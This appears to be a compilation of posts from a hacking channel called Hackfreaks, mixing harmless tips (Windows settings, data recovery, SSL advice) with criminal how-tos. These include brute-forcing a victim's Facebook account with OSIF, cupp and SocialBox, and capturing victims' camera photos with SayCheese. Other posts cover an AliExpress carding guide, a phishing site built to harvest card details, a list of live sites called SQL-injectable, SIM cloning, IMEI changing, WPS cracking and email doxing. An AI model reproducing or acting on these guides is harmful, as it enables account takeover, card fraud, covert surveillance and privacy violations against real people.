Hide data in an audio file


Hello my little Freaks. We  looked at a method for hiding files in a picture, and this time we will show you a method for hiding data in audio files.


 Let's get started:


 1. Download and install DeepSound - http://jpinsoft.net/DeepSound/Download.aspx


 2. Open the program and click on "Open carrier files", then specify the path where the audio file is stored, where the information will be hidden.


 3. Click on "Add secret files" and select the required data.


 4. Next click on "Encode secret files".


 The files were hidden in the "music".  In order to get them out of there, on the main page of the program, add the audio file in which the data was encrypted and click on "Extract secret files".


 Done!  Now you know another method for storing important information securely.



Enjoy! Follow us for more...

How to Enable Reputation-Based Protection in Windows 10

 According to Microsoft, ‘Reputation Based Protection’ can help protect your PC from potentially unwanted applications. Once enabled, it will automatically block apps and downloads that it feels to be malicious or might cause unexpected behaviors. This article will share a detailed guide on how to protect your Windows 10 computer from Potentially unwanted applications. 


🔹Step 1: First of all, click on the Start button and select ‘Settings.’


🔹Step 2: On the Settings app, click on the ‘Update & Security.’


🔹Step 3: Next, select ‘Windows Security’ from the left side pane.


🔹Step 4: From the list of options, click on ‘App & browser control.’


🔹Step 5: Now on the ‘Reputation-based protection’ section, click on the ‘Turn on’ button.


🔹Step 6: Next, click on the ‘Reputation-based protection settings.’


🔹Step 7: Scroll down and enable the ‘Potentially unwanted app blocking’ and enable the ‘Block apps’, and ‘Block downloads’ option.


Enjoy! Follow us for more...

How to Change/spoof IP Addresses in Linux


✳️ Changing/spoofing IP addresses can be fairly simple in Linux. Remember that in most cases, you're going to have a dynamically assigned address from a DHCP server. In some cases, you may need to reassign the address, especially if you're hacking. This can be useful in spoofing your IP address, making network forensics more challenging, but certainly not impossible.


✅ We can do this by using the ifconfig command with the interface we want to assign the IP to and the IP address we want. Such as:


🔹 ifconfig eth0 192.168.1.115


✅ Now, when we type *ifconfig** , we can see that our IP address has changed to the new IP address.


✅ We can also change the netmask and broadcast address, if necessary, such as:


🔹ifconfig eth0 192.168.1.115 netmask 255.255.255.0 broadcast 192.168.1.255 


Enjoy! Follow us for more...





Create Animating the text and rule

 

Download now

Enjoy! Follow us for more...

Use Social Info to find information about social media accounts

 

Download now

Enjoy! Follow us for more...

Buy Bitcoin With Credit Card And Debit Card

 💰


Ⓜ️Steps -


Step 1 - Go To SportsBet.io


Step 2 - Signup For A New Account..


Step 3 - Click On +Deposit


Step 4 - Go To Buy Btc And Enter The Amount U Wish To Buy Btc..


Step 5 - It Will Ask For Card Details And Billing Address..


Step 6 - Wait 48Hrs To Get Your Btc Deposited In Your Account..


Step 7 - As Btc Get Deposited Transfer The Btc To Your Btc Address..


Enjoy! Follow us for more...

HOW TO HACK A FACEBOOK ACCOUNT


Requirements:

- Termux

- 200 MB space

- Facebook target link

- Info about target

- Root


Setup:

$ apt install nodejs -y


$ pkg install git tsu -y


$ apt install python python2 -y


$ apt update; apt upgrade -y


$ npm install --global facebook-id-of


1️⃣ Getting ID


The first what we need is the ID of the facebook user, this can be found out through the facebook-id-of tool, which we have installed.


On the target profile, we can see URL like this:

https://www.facebook.com/michael.schmidt.7965692 — Remove the hyperlink and copy online name after facebook.com/.


$ facebook-id-of michael.schmidt.7965692


› Facebook ID of michael.schmidt.7965692 is 671393100


2️⃣ Dumping Information About Target


For this, we're gonna using the tool OSIF, it's still working and helping us, to get some details.


$ pkg update upgrade


$ pkg install git python2


$ git clone https://github.com/ciku370/OSIF


$ cd OSIF


$ pip2 install -r requirements.txt


For this tool you need a working, non 2FA facebook account, which can be used for scanning our target. (TARGET MUST EXIST IN FRIEND LIST)


$ python2 osif.py

D3b2y >> token

Type username (email) & Password.


D3b2y >> cat_token

[*]Your access token !!


Setup done now  Hype


D3b2y >> dump_id

D3b3y >> dump_671393100


This fetching some informations about our target an example can be found here:


https://pastebin.com/10H7C22T


If you know your targets e-mail, it's much easier to attack them from the »bruteforce« tool.


D3b3y » dump_mail


Now on to creating a wordlist for bruteforcing


While people downloading random wordlists, creating wordlist with crunch and trying any other method with much effort, we can easily generate a wordlist related to information about our victim. This method has helped me several times to get into an Instagram account.


$ git clone https://github.com/Mebus/cupp.git; cd cupp/


$ python3 cupp.py -i


After tool has been started, fill out the information which you have dumped with OSIF.

It's asking :

> Do you want to add some key words about the victim? Y/[N]: y


> Please enter the words, separated by comma. [i.e. hacker,juice,black], spaces will be removed: football,blue,dog,maddisonschoolmarvelmovies,black,michaeljackson


> Do you want to add special chars at the end of words? Y/[N]: n


> Do you want to add some random numbers at the end of words? Y/[N]:y


> Leet mode? (i.e. leet = 1337) Y/[N]: y


$ cp -R test.txt $HOME


Choose same, if you need keyword put all keywords about target, if you target likes barcelona football club, type barcelona,football.

These keywords can be anything the victim likes. Mother's name, hobbies, favorite movies, food, color, sports, etc.


It's saved as name, as you used for the firstname. If you don't know partner, use any best friend information, there are few apps like tellonym.me, instagram.com, snapchat.com to fetch as much information as you need.


Bruteforcing the account


$ pkg install nano -y


$ git clone https://github.com/TunisianEagles/SocialBox.git; cd SocialBox; chmod +x *.sh


$ nano install-sb.sh


Edit all sudo lines, only remove sudo:

sudo apt-get update

After:

apt update


Exit — ctrl+x — y (yes) — enter.


$ ./install-sb.sh


$ cp -R $HOME/test.txt $PWD


$ ./SocialBox.sh


CP means we are copying our text file from cupp folder to home, then from home to the socialbox folder. Do it, you need in social a wordlist which has been created. If you don't want to copy it :


Choice >  1

Enter Facebook ID / Email / Username / Number: 671393100

Enter wordlist path : $HOME/cupp/test.txt


Now the Bruterforcer will start to read your password list, or the word list you specified, and then try to test the password in the background using YOUR IP address. I have also tried to crack a Facebook account a few times, please use a VPN!



Enjoy! Follow us for more...

HOW TO FIND DELETED YOUTUBE VIDEOS / WORKING


Step 1: Go to YoutubeThe very first thing to do is head over to the Youtube page. We are not on Youtube’s page to view the video as it is already deleted from the platform. Just log in as usual to Youtube, and go to the section where the deleted Youtube video is listed and which you want to retrieve. Get the link to the deleted youtube video which you want to retrieve.


Step 2: Go to WayBackMachineWayBackMachine is an internet archive project made to achieve all the good things that existed in the internet. You can find an archive of almost all sites on the very website. You just have to get the URL of the website whose history you want to see and give a simple search on this WayBackMachine site. They consist of more than 531 billion of pages archive. ( at the time I am writing this post). This project was mainly developed for developers or historians or researchers to provide them with the internet archive so they can get information about the past things that existed on this internet.

Now After you get the link to the deleted Youtube video which you want to retrieve. Open a New Tab in your respective browser. After opening the tab, put archive.org in the URL bar. or google search ‘Way Back Machine’ and select the first option. By either way, you will get to the respective website. You will see the WayBackMachine’s website with a lot of icons and shits in it. Just look for the search box with the go button. Now the main show begins lol.


Step 3: Paste the UrlNow you are on the WayBackMachine page. Head over to the search and go part of the page as mentioned in the picture above. Now Paste the Youtube deleted video’s URL that you have got from step 1. or you can go to the next tab where the Youtube page is open to copy-paste the Youtube deleted videos URL. After putting the respective URL in the search box click the go button and see the magic lol.

Step 4: Check Browse HistoryPut the link in the search box which is next to the Waybackmachine. Thoroughly make sure you have a copy and paste the correct URL. Putting the incorrect URL will give you a completely different result than you expected. So make sure you have entered the correct URL and hit the enter button from the keyboard to search for that URL. And now grab popcorn and stay back and let the site find that respective video for you.


Step 5: Enjoy it!


Enjoy! Follow us for more...

Viral Page Free Traffic

 

Download now


Enjoy! Follow us for more...

How to infect Microsoft Office documents?

 

 Greetings to Hackfreaks readers!  Today we'll talk about how Microsoft Word is infected and why you shouldn't open unverified documents, pdfs, etc. Brought to you by hackfreaks official  Viruses, tracking, refs - these are exactly the things that integrate well into Word.  Usually, people do not check documents for vulnerabilities, and antiviruses do not sound the alarm, so attackers are actively using this.  We, in turn, will not embed a specific virus, but simply consider this method using the example of IPloggers : https://iplogger.org/


 Instructions:


 1. Create a new Word document> Go to the "insert" tab> item "integrate video from the Internet"

 2. Select YouTube> write the desired channel name and select the video.  Everything.  Our video in file

 (you can choose any other site, not necessarily YouTube)

 3. Save and close the document> run WinRAR> find our document

 4. Click on the document and its internal content opens> open the word folder> see the document.xml file

 5. Drag it to the desktop and open it through notepad> find a link to our video in it and replace it with the IPlogger link

 6. Save and return to Winrar


 Everything.  Now if you open our Word document, the movie will remain there.  Even if you hover the cursor, a link to the video will be displayed, and not to IPlogger. And keep supporting hackfreaks official. After a person tries to watch the video, we will instantly receive his coordinates and IP address.  Such manipulations in Word can be done with absolutely anything, so there is only one conclusion - check everything and always


Enjoy! Follow us for more...

4 Proven Ways To Find a Website's IP Address

 ​

This tutorial teaches you how to find the IP address of a website. You can do this by using your computer's built-in "traceroute" function, or by downloading and using a free traceroute app for your iPhone or Android.


♨#1 ON WINDOWS♨


 • Open your PC and click on start menu. Search For "cmd" (Without quotes)


• Right Click on cmd and click on "Run as administration"


• Now enter a command -


              ping website address -t


   Ex. - ping google.com -t


• Now hit enter. You will get it.


===============================


♨# 2 ON MAC OS♨


• Open Spotlight (Click the magnifying glass-shaped icon in the top-right corner of the screen.) 


• Search for Network Utility and open it. After that Click on Traceroute tab in network utility.


• Now Enter website address in input box and click on trace button You will see the IP address of website


================================


♨ #3 ON ANDROID ♨


• Download and install PingTools Network Utility app then open it.


• Tap ☰. It's in the upper-left corner of the screen. A pop-out menu will appear.


 • Now tap Traceroute Enter Website address and click on trace button 


=================================


♨ #4 ON IPHONE ♨


•Install and Open Inettools app


•Click on Traceroute then Click on adress bar and input website address (e.g. google.com) 


•Click on start. You will see the IP address of website. 


📝Note - Do not try to find ip address of Government sites (.gov, .gov.in, ac.in etc)


Enjoy! Follow us for more...

How to Add Lock Option to the Taskbar in Windows 10.

 ❇️ 

🔹Step 1: First of all, right-click anywhere on your desktop and select New > Shortcut.


🔹Step 2: On the “Type the location of the item” field, enter the path –


Rundll32.exe user32.dll,LockWorkStation


🔹Step 3: Once done, click on the ‘Next‘ button.


🔹Step 4: Now in the ‘Type a name for this shortcut’ field, enter ‘Lock’ and click on the ‘Finish‘ button.


🔹Step 5: Now you will find a Lock Shortcut icon on the desktop. Right-click on it, and select ‘Properties‘


🔹Step 6: Click on the ‘Change icon’ button and browse the icon that resembles the lock option best for you.


🔹Step 7: Once done, right-click on the shortcut file, and select ‘Pin to taskbar’ or ‘Pin to Start’


🔹Step 8: Now, whenever you want to lock your PC, click on the Taskbar lock icon.


      ✅ That’s it! You are done. This is how you can add the lock option to the Start menu and Taskbar in Windows 10.


Enjoy! Follow us for more...

How to Hide Data inside Images


🔹Step 1: Create a folder. Name it anything you wish, say hide.


🔹Step 2: Now put anything and everything you want to hide in this folder. Text files, other images, executables - anything. Also, put the image behind which you want to hide the files in the same directory, say “image.jpg”.


🔹Step 3: Now we need to archive this folder. You can use your choice of compression tool for this (I recommend the free and open-source 7-zip). So now we have a zip file hide.zip containing all of the data we want to hide behind an image.


🔹Step 4: You should have your image, say image.jpg (inside of which we’ll hide our data) in the same directory as hide.zip (next to it).


🔹Step 5: Now simply open up the command prompt and move to the folder where image.jpg and hide.zip are located using the cd command:cd PATH For example: cd C:\Folder cd desktop


🔹Step 6: Now we type in the following command:copy /b image.jpg + hide.zip output.jpg


  ✅ That's it, you're done. Hope you will find it useful.


Enjoy! Follow us for more...

Using nbtstat to Find a Computer Name

 

🌀Have you ever wanted to know what computer belongs to what IP address?


🔹This information can come in very handy when trying to troubleshoot network issues or see if there are devices on your network that don't belong there.


🔹Just knowing the IP address of a device on your network may not be enough information to figure out what you need to know.


🔹Sure you can ping an IP address but that only tells you if there is connectivity.


🔹Sometimes you can use the -a switch with the ping command and see if you get lucky and it resolves the IP address to a name.


🔹Another command line utility you can use to help you in your quest for finding the computer name associated with an IP address is the DOS command nbtstat to find NetBIOS computer names if you use NetBIOS on your network.


🔹Just open a command prompt by going to Start, Run then type in cmd and click OK. Here are the available switches you can use with the nbtstat command.


🔹The one you want to use to find the host name associated with the IP address is nbtstat –a followed by the IP address. In the following example you can see 192.168.1.2 is the IP address, Jim is the computer name and WORKGROUP is the workgroup name.


❇️ I hope you learn something new 


Enjoy! Follow us for more...

What is network sniffing ?


🌀Computers communicate by broadcasting messages on a network using IP addresses. Once a message has been sent on a network, the recipient computer with the matching IP address responds with its MAC address.


🌀Network sniffing is the process of intercepting data packets sent over a network.This can be done by the specialized software program or hardware equipment. Sniffing can be used to ;


▫️Capture sensitive data such as login credentials

▫️Eavesdrop on chat messages

▫️Capture files have been transmitted over a network


🌀The following are protocols that are vulnerable to sniffing


• Telnet

• Rlogin

• HTTP

• SMTP

• NNTP

• POP

• FTP

• IMAP


The above protocols are vulnerable if login details are sent in plain text

Enjoy! Follow us for more...

HOW TO HACK WIFI USING ANDROID WPA2 WPS Routers


Root a compatible device. Not every Android phone or tablet will be able to crack a WPS PIN. The device must have a Broadcom bcm4329 or bcm4330 wireless chipset and must be rooted. The Cyanogen ROM will provide the best chance of success. Some of the known supported devices include:

*Nexus 7

*Galaxy Ace/S1/S2/S3

*Nexus One

*Desire HD


🔰

Download and install bcmon. This tool enables Monitor Mode on your Broadcom chipset, which is essential for being able to crack the PIN. The bcmon APK file is available for free from the bcmon page on the Google Code website.

*To install an APK file, you will need to allow installation from unknown sources in your Security menu.


🔰

Run bcmon. After installing the APK file, run the app. If prompted, install the firmware and tools. Tap the "Enable Monitor Mode" option. If the app crashes, open it and try again. If it fails for the third time, your device is most likely not supported.

*Your device must be rooted in order to run bcmon.


🔰

Download and install Reaver. Reaver is a program developed to crack the WPS PIN in order to retrieve the WPA2 passphrase. 


🔰

Launch Reaver. Tap the Reaver for Android icon in your App drawer. After confirming that you are not using it for illegal purposes, Reaver will scan for available access points. Tap the access point you want to crack to continue.

*You may need to verify Monitor Mode before proceeding. If this is the case, bcmon will open again.

The access point you select must accept WPS authentication. Not all routers support this.


🔰

Verify your settings. In most cases you can leave the settings that appear at their default. Make sure that the "Automatic advanced settings" box is checked.


🔰

Start the cracking process. Tap the "Start attack" button at the bottom of the Reaver Settings menu. The monitor will open and you will see the results of the ongoing crack displayed.

*Cracking WPS can take anywhere from 2-10+ hours to complete, and it is not always successful




Enjoy! Follow us for more...

HOW TO GET ACCESS TO BLOCKED WEBSITES


Let us discuss all the methods i.e., from easier methods to harder ones.


1. Recast the URL


This trick works for the sites which are hosted on VPN and on Dedicated server Environment and have an unverified SSL installed for that domain name. To get access to such websites you have to implement 2 simple steps. They are:


1. Go to the address bar of the browser (Any browser)

2. Instead of typing www.websiteURL.com or http://www.WebsiteURL.com, try typing https://www.WebsiteURL.com

So, as the domain is unverified with SSL installation, it will show up a security notice with the options as Proceed anyway or Back to Safety. Here, you have to select the option Proceed Anyway, then you will get an entry ticket to the site.




 


2. DNS Server Replacement


In this method you have to change or replace the DNS server to get access over the blocked websites. Say, DNS server is the container which contains all the information regarding all the sites from the entire world. So, if any country blocks any website IP from their Country IPs, they block it in their own DNS server. Whoever uses those particular DNS servers will not be able to access the blocked websites. MNC Companies, Schools, Colleges generally use this method to block the sites. To bypass this situation we have a simple trick. These methods slightly vary for different users. Just follow the steps below.


For Windows XP users


¶Click Start > Control Panel > Network Connections.

¶Now select your specific Internet connection with access problems, right-click, then select Properties.

¶Left-click Internet Protocol (TCP/IP), and select Properties.

¶Follow the Step 5 instruction given above in properties.


Windows 7, 8, 8.1 and Vista Users


¶For Windows Vista and 7, go to Start > Control Panel > Network and Internet > Network and Sharing Center. If you’re using Windows 8, hit Windows key + C > click Search on the right-hand side > type Control Panel in the search bar > select Control Panel > Network and Internet > Network and Sharing Center.

¶Click Change adapter settings, which is on the left sidebar.

¶Right-click the Internet connection (MTNL, Airtel, BSNL, etc.) on which you’re having trouble accessing websites, and click Properties.

¶Select Internet Protocol Version 4 (TCP/IP), and then click Properties.

¶Click the radio button next to Use the following DNS Server address.

If you want to use Google DNS, enter 8.8.8.8 as the Preferred DNS Server and 8.8.4.4 as the Alternate DNS Server.

¶If you want to use OpenDNS, use 202.67.220.220 and 202.67.222.222 respectively. After entering these, click OK


For iOS device Users


¶Open Settings > tap Wi-Fi > tap the Wi-Fi network the device is connected to.

¶Tap DNS and change the two values to Google DNS or Open DNS (explained in step 5 above). These two values should be separated by a comma and one space (8.8.8.8, 8.8.4.4).


For Android users, these are the steps.


¶Open Settings > tap Wi-Fi.

¶Long press the Wi-Fi network you’re connected to > tap Modify Network.

¶Now tap the box next to Show advanced options. Scroll down.

Tap DHCP > select Static IP > scroll down and modify DNS 1 and DNS 2 (as explained in step 5 above).

¶Click the radio button next to Use the following DNS Server address. If you want to use Google DNS, enter 8.8.8.8 as the Preferred DNS Server and 8.8.4.4 as the Alternate DNS Server. If you want to use OpenDNS, use 202.67.220.220 and 202.67.222.222 respectively. After entering thes

e, click OK.

How to Bypass or Unblock Blocked sites


🌀Today everyone of us is a part of any college,office or any organization.


🌀Everywhere we find free open wifi’s , but the major problem with these are there are many websites which are blocked by the servers of college,ofiice or any organization.


🌀There are different type of securities that are implemented in these server to block some sites like Facebook ,Twitter etc.


🌀So In this post i’ll tell you easy and permanent method to access or bypass blocked sites 


💢 Steps To Bypass Blocked Sites-


 1. Connect your pc or laptop with wifi or your broadband connection in which you want to access blocked websites.


 2. Open command prompt by clicking start and the typing “cmd” and then pressing enter.


 4. 3. Now a command prompt window will appear.


 5. Type ping Websitename (for exp: ping http://facebook.com) and press enter.


 6. Now open your browser and enter the site which you had recently ping.


 7.You will see the site will get opens


● This is very simple method to easily access blocked sites.


Enjoy! Follow us for more...

Watch IPL for Free Using Those Streamable Links


🌀 English - http://www.freeIivetv.ga/sports/english.html

🌀 English HD - http://www.freeIivetv.ga/sports/english-hd.html

🌀 English 4K - http://www.freeIivetv.ga/sports/english4k.html

🌀 Hindi - http://www.freeIivetv.ga/sports/hindi.html

🌀 Hindi HD - http://www.freeIivetv.ga/sports/hindihd.html

🌀 Hindi 4K - http://www.freeIivetv.ga/sports/hindi4k.html

🌀 Tamil - http://www.freeIivetv.ga/sports/tamil.html

🌀 Telugu - http://www.freeIivetv.ga/sports/telugu.html

🌀 Kannada - http://www.freeIivetv.ga/sports/kannada.html

🌀 Bengali - http://www.freeIivetv.ga/sports/bengali.html

🌀 Marathi - http://www.freeIivetv.ga/sports/marathi.html

🌀 Malayalam - http://www.freeIivetv.ga/sports/malyalam.html

    

  Enjoy! Follow us for more...

HOW TO CLONE A SIM


Step 1: Remove the SIM from the phone, place it in the card reader, click read from the card in magic SIM.


When it displays ‘connected’, select crack SIM in the toolbar.



Step 2: Click strong KI and select all of the other find options and then click start.



Once your KI is found and the crack is finished, click the file, save as and save your cracked SIM info to a file.



Step 3: You must click disconnect from the file menu or you will ruin your SIM card. [Important, Otherwise SIM will crack]



Step 4: Once it says disconnected. Remove the SIM. Put the SIM in your phone and see if it still works, it should.



(If not, either you did not unlock your SIM, or you tried to copy it instead of crack and save.)



* Unlock SIM Card *



Go to phone tools, select SIM card, then select unlock SIM, it will prompt for a code.



Call network provider, they will ask for your phone number, your account info, name, and security code, then they will ask why you want to unlock your SIM card, just tell them you need to unlock your SIM to get it to work with your overseas phone or something.



Once they give you the SIM unlock code, enter it, and it will say SIM unlocked.


Step 5: Insert blank SIM card and open USB SIM Card Reader Software not magic SIM at this point.



Step 6: Click connect. It should say ‘No Info Found’ if it is truly blank.



Step 7: Select write to SIM, it will prompt you to select a .dat file, select the one you saved earlier.


Step 8: Now click start, it will take about 10 minutes to write it, once it is complete, it will ask for a security code, enter the security code the network provider gave you, then click Finish.


Enjoy! Follow us for more...

How To Create Your Own Web Hosting Site For FREE!


1: Register Free Domain At: Freenom.com


2: Change Nameservers To:


ns1.byet.org


ns2.byet.org


ns3.byet.org


ns4.byet.org


3: Go To MyOwnFreeHost.Net Sign Up With The Domain & Email Adress.


4: You'll Receive An Email Under 5: Hrs With The Details Of cPanel


Enjoy! Follow us for more...

FIREWALL IN ANY ANDROID DEVICE

 

🌀DESCRIPTION:   firewall is the security in any operating system that disallows all the dangerous IP’s and also the harmful programs to penetrates in the operating system


🔹Steps To Add Firewall In Any Android Device:


✍Step 1. First of all, you need to download and install the cool android app that is NoRoot Firewall the app that will allow you to add firewall feature to your device.


✍Step 2. Now you need to launch the app after installing it in your device. Now you need to click on “Start"....


✍Step 3. Now you need to allow the connection, simply tap on “OK” to continue


✍Step 4. Now you need to move over the “Pending Access” tab and there you will see all the apps that require connecting to the internet. Simply allow them or deny them as per your wish


🌀 That’s it! you are done, now your Android has a Firewall that will be securing your device from various threats.


Enjoy! Follow us for more...

How To Download Youtube Videos Without External Tools Or Extensions On PC


Open Developer Tools in the browser and go to Network tool, or if you’re on Firefox press Ctrl + Shift + Q .


Click Media in the Network tool so that you’ll see only the HTTP requests made to media files, like audio and video files.


Browse to a YouTube video you want to download. You’ll start seeing the requests made by the YouTube page to the audio & video files in the Network tool.


Hover the cursor over the Type column of each request in the tool and look at the media type:


If you want the audio, look for “audio/mp4”.


If you want the video, then look for “video/mp4”.


Note: If you’re using a browser that doesn’t segregate requests (like IE) or doesn’t list the requests made to the audio & video files in YouTube under “Media” (like Chrome), just search the term “audio” or “video” in the search bar in the Network tool.


Once you found a request with the wanted media type (it’ll be of the googlevideo.com 13 domain), click on it, and copy the full URL from where it appears.


Paste the URL in the address bar, remove the range parameter in the query string and press Enter .


The video or audio will open, right-click on the page and select “Save As” to save the file.


If you want both the video and the audio, look for both with the steps above and put them together using any default media editor you have in your computer. It’s actually pretty easy and quick to do so (even with programs like the outmoded Windows Movie Maker).


Enjoy! Follow us for more...

How To Change IMEI Using MTK Engineering Mode App

 


FOLLOW STEPS BELOW.......

Step 1

Open engineering mode » Click on Engineer Mode (MTK) »

Swipe left to Connectivity » click on CDS Information »

Radio Information.


Step 2

Click on phone 1 if you want to change your sim 1 or

choose Phone 2 to change sim 2 IMEI, follow this guide:

For Phone 1: “AT+ EGMR=1,7,”YOUR NEW IMEI

NO” (make sure you add a space in between AT+ &

EGMR)

For Phone 2: “AT+ EGMR=1,10,”YOUR NEW IMEI

NO” (make sure you add a space in between AT+ &

EGMR)


Step 3

Press the “Send At Command” (You should receive a

message that your ‘AT command sent)


Step 4

Reboot and dial *#06# to confirm your new IMEI.


Enjoy! Follow us for more...

ALIEXPRESS CARDING METHOD BY @hacking wolf

 


 Now I will tell you about Aliexpress carding method. Recent times site Aliexpress becomes a favorite place for carders.Brought to you by Hackfreaks.  Previously there were no problems with using CC FULLZ  but now there have been some changes. 


So how to card Aliexpress.


If you want to have successful carding on Aliexpress then first you must need to know process, now I'm going to show you up-to-the-minute Aliexpress Carding Method of 2020, fully Guide and it is working method, but remember that you need to buy valid CC FULLZ in CVV shop online. It will help you complete this process correctly.


A LIST OF WHAT WE NEED FOR ALIEXPRESS CARDING:



1) Facebook account.


2) CC (credit card) - you can find the necessary CC FULLZ in our CVV shop online ss209. The EU CC for instance of Italy, Spain, France, Germany, the Netherlands ... well, in general Europe. As well as very good exotic - New Zealand, Costa Rica and so on.


3) SSH tunnel or Socks (USA). We posts socks (proxies) Daily on Hackfreaks.


4) Compliance with security measures - trukript + virtual + 2VPN (not public).



WE PROCEED TO THE PROCESS:


1) Run the VPN, activate the sock or set up tunnel.


2) Sign up for Aliexpress using your Facebook account.


3) We look at the goods in the aliexpress store for about 15-30 minutes (optional).


4) Next, select the product. Push buy now. Fill in the data for delivery. And then choose the payment method Credit or Debit Card. We drive in data from the card. In the name of the cardholder indicate the name of the recipient of the goods. Then after successful payment we save the card. And we continue to pay for purchases. This is full Aliexpress carding method.brought to you by Hackfreaks.



I remind you that no carding method which works 100%. There are too many different conditions that need to be observed, such as software, quality of CC FULLZ, country of delivery, experience of a carder and a bit of luck. There are also many online stores starting from such as Amazon and eBay and ending with other little known ones. 


Carding is an art and does not like deletants. In order to become successful, you need to learn to spend time and invest in your training. This is the only way to succeed. Join Hackfreaks .Do not look for a carding method that works 100%. If you want to find an easy way to make money on carding, you will not succeed. Only becoming a professional you can call yourself a real carder.


It is very important to have an official supplier. Buy CC FULLZ in verified CVV shop online. You should not pay attention only to the price, on the Internet there are many fake sellers who offer low prices. We receive hundreds of messages from people who have been deceived. Do not buy CC FULLZ in chat rooms, ICQ, from unfamiliar people. Do not trust sellers who say that all the cards that he sells have a high balance. They speak what you want to hear, not what it really is. I hope our warnings will help you to avoid cheating and buying low-quality FULLZ, dumps and CC.


___

 Enjoy! Follow us for more...

HOW TO GET SOMEONES NAME, PICTURES AND INFORMATION WITH ONLY AN EMAIL


Create a facebook page


Go to page role manager 

(https ://www.facebook.com/(your-page-id)/settings/?tab=admin_roles or for example 


Type the email of the person you are trying to dox 


The targets name and surname will be shown below the box, then just search them on facebook and continue your doxing journey.


Enjoy! Follow us for more...

Some SQL Vulnerable Sites

 ​

http://www.mtosmt.org/mto-announce.php?id=8

http://www.seaofstories.com/title.php?id=4781

http://www.dhammaweb.net/Tipitaka/read.php?id=153

http://www.hdtinfo.com/news/read.php?id=1157947239

http://www.verticalinfo.biz/en/read.php?id=874

http://www.visitogunquit.org/event.php?id=20

http://www.barracuda.gr/newsone.php?id=50

http://www.orbisoud.com/readnews.php?id=124

http://www.koreasarang.com/readnews.php?id=1


Enjoy! Follow us for more...

How to Hack any Device's Camera over Internet


Using Kali, or Termux, you can hack any device's front camera(be it 💻 or 📱) over Internet  using SayCheese tool🔥


✅ Requirements:

🌀 Kali Or Termux

🌀 Ngrok 


⚠️ If you are using Termux, please turn on your WIFI- Hotspot before using the tool


✅ Steps to use


🌀 Download the repository by typing in the Terminal


git clone https://github.com/Anonymous3-SIT/saycheese.git


🌀Goto SayCheese directory by typing the command


cd saycheese


Make them executable


chmod +x *


🌀 Run it


bash saycheese.sh


🌀 Select Option 2 (Ngrok)


🌀 Now, SayCheese will automatically download Ngrok and run it


🌀 Copy the link


🌀 Social Engineer it to the victim. Once he'll allow camera access


💢 Boom! SayCheese will automatically snap photos from the victim's camera


Enjoy! Follow us for more...

Method How To Get Unlimited Live Users Credit Cards - A Special Method (Prv8)


Well guys its my personal and working tested method ! you can easily hack alot of Credit cards by this method!


its just a simple way to get CC FULLZ !!


just follow mine instruction below and you can easily able to get Credit cards !



What you need ??

A Web host

A Script 

A Brain



Step One - 1st you need to get the web hosting from any cheap providing 


Step Two - DOwnload The web hosting script from here : https://www.webador.com/


Step Three - Download Pagebreeze Html Editiing software from here (Its just about 7MB) : 

http://www.pagebreeze.com/download.htm


STep Four - Open Pagebreeze and open your HTML Script in editor ..


Step five - Edit the order page via Pagebreeze 


Step Six - Go to the any free form generator service website. like some websites i m providing here 

www.emailmeform.com/

www.phpform.org/

www.formstack.com/


Step Seven : Now create a form with these information :

First Name:

Last Name:

Date of birth :

Address:

County :

City :

State :

Email:

Phone Num :

Zip Code : 


Step Eight :

Save your form and palce the Html script on your website order page


Step Nine : Now go again to form generator website and create anothr forum with these information :

Credit Card Number :

Credit Card Type ( Choose Drop Down Menu Option)

CVV :

Expire Date :


Now save this form and put this on order page on your script - Remember you need to link 1st form

to second form (USE REDIRECT SYSTEM)


Step Ten : Edit your website script apperince and give some stlyish look



Step Eleven - After all the setup nd scripting upload and HTML web hosting script ..


Step Twelve : Now just you need to spread you website on diffrent forums and get visitors ..


NOTE : try to spread your web hosting service on Hacking forums with the tile cardable website hosting , hack cc hosting and

such titles will bring you more credit cards..


Many web visitors = many credit cards !!


So this is the tutorial to get Credit cards from live users ! hope you all like it . if you 

have any problem in setup the website , scripting or forms, feel free to ask me !


Enjoy! Follow us for more...

HOW TO MAKE UNLIMITED GMAILS


1. You will need an valid gmail account already for this trick i'm going to say that my gmail account is this as an example: something123@gmail.com


2. After you already have a valid gmail account you will need to go to this site: https://generator.email/blog/gmail-generator


3. When you in that site you going to want to put the username of your valid gmail account for example mine will be something123 without @gmail.com put that in the generator

(Just put your valid gmail on that site and click generate)


4. the site will generate tons of mails you want to use those gmails for anything you need and you will receive the messages on your valid email


all the messages people send to those generated emails i will receive it on my valid email that it is something123@gmail.com so copy any of those generated email from the site and you will receive the email message on your valid Gmail

Enjoy! Follow us for more...


How to Move Emails from One Gmail Account to Another


The method is just simple and straight and you will use some of Gmail account settings that will allow you to transfer all the email to another account. 


And this is a feature of Gmail that probably none of you was know about it.


 Steps To Enable POP In Old Email Account To Import Mails To New Account:


 1. First of all login into your Gmail account whose email you want to move to another account.


 2. Now click on settings button there on below your profile picture of your account.1


 3. Now under settings click on Forwarding and POP/IMAP option and there enable Enable POP for all mail (even mail that’s already been downloaded).


 4. At below select Mark Gmail Copy As Read in the drop down option and then simply click on save changes option.


 5. Now visit your new Gmail account to which you want to get all your mails.


 6. There click on Settings and under it click on Accounts and Import and there select Add a POP3 mail account you own,


 7. Now a popup windows will appears where you need to enter the email address from which you want to import emails and then click on next step.


 8. Now on the another page simply proceed by entering the password and all other fields will be auto filled there and simply click on Add account.


 9. Now on the next screen simply click on yes option and click on add.


 10. Thats it you are done, now all the emails of that account will be there in your new Gmail account.


 Above is all about How to Move Emails from One Gmail Account to Another, With this method you can easily transfer all the mails from one account to another with those simple guide. ___


Enjoy! Follow us for more...

How to Data Recover Files from Corrupted USB and Memory Card


🌀Step 1 First download M3 Data Recovery software and install in your Windows or Mac.


🌀Step 2 Once your download complete after connect your Pen Drive or Memory Card to your computer.


🌀Step 3 Now run the program and click Data Recovery module.


🌀Step 4 Choose your pen drive or memory card and then click Next=> to search your lost data.


🌀Step 5 M3 Data Recovery will analyze every sector on the selected volume and then find the lost files.


🌀Step 6 When the scan finishes, you will be able to preview found files. Then select files you want to recover and save them.


Enjoy! Follow us for more...

Using Encryption Via SSL


Most legitimate websites use what is called “secure sockets layer” (SSL), which is a form of encrypting data when it is being sent to and from a website. This keeps attackers from accessing that data while it is in transit.


Look for the padlock icon in the URL bar, and the “s” in the “https://” to make sure you are conducting secure, encrypted transactions online.


It’s a good idea to access sites using SSL when:


⚫️ You store or send sensitive data online. If you use the internet to carry out tasks such as filing your taxes, making purchases, renewing your driver’s license, or conducting any other personal business, visiting sites using SSL is a good idea.


